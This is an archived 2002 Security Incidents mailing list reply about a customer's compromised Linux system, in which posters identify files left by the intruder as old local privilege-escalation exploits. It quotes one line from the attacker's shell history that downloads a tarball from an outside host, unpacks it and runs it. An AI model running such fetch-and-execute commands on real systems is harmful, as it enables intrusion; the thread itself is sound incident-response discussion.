Security Incidents mailing list archives
Re: Rooted, .haos on system
From: Carlos Eduardo Pedroza Santiviago <segfault () brturbo com>
Date: Mon, 16 Dec 2002 18:31:03 -0200
On Mon, 16 Dec 2002 13:47:28 -0500 Damian Gerow <damian () sentex net> wrote:
On Mon, 2002-12-16 at 12:38, Damian Gerow wrote:On Thu, 2002-12-12 at 18:50, Damian Gerow wrote:I've just received word that one of our customers was rooted, and he's asking about the file ".haos". Nothing rings any bells, has anyone heard of it?Just a quick update to this...And one last tidbit... Left in the .bash_history was this: w cd /tmp wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz ./epc A quick check tells me that 'epc' is a backdoor utility, and the other file contained within loc.tgz looks like a trojaned 'su'.
No, for me this looks like: epc -> ptrace local exploit su -> su local exploit They're old shit, and i guess your system wasn't updated.
I've already notified Geocities abuse, and haven't heard back from them yet.
Good luck, -- Carlos Eduardo Pedroza Santiviago -- <segfault@*NO_SPAM*brturbo.com> Key id/fp = 4B5EB579/A817 71A3 AA78 1997 65DA 0665 A341 D4A4 4B5E B579
Attachment:
_bin
Description:
Current thread:
- Rooted, .haos on system Damian Gerow (Dec 15)
- Re: Rooted, .haos on system Damian Gerow (Dec 16)
- Re: Rooted, .haos on system Damian Gerow (Dec 16)
- Re: Rooted, .haos on system Mike Katz (Dec 16)
- Re: Rooted, .haos on system zeno (Dec 16)
- Re: Rooted, .haos on system Carlos Eduardo Pedroza Santiviago (Dec 16)
- Re: Rooted, .haos on system Damian Gerow (Dec 16)
- Message not available
- Re: Rooted, .haos on system Julian Young (Dec 17)
- New CIFS (port 445) worm? David Gillett (Dec 17)
- Re: New CIFS (port 445) worm? Zen (Dec 17)
- Re: Rooted, .haos on system Damian Gerow (Dec 16)
- Re: Rooted, .haos on system Damian Gerow (Dec 16)
- Re: Rooted, .haos on system zeno (Dec 16)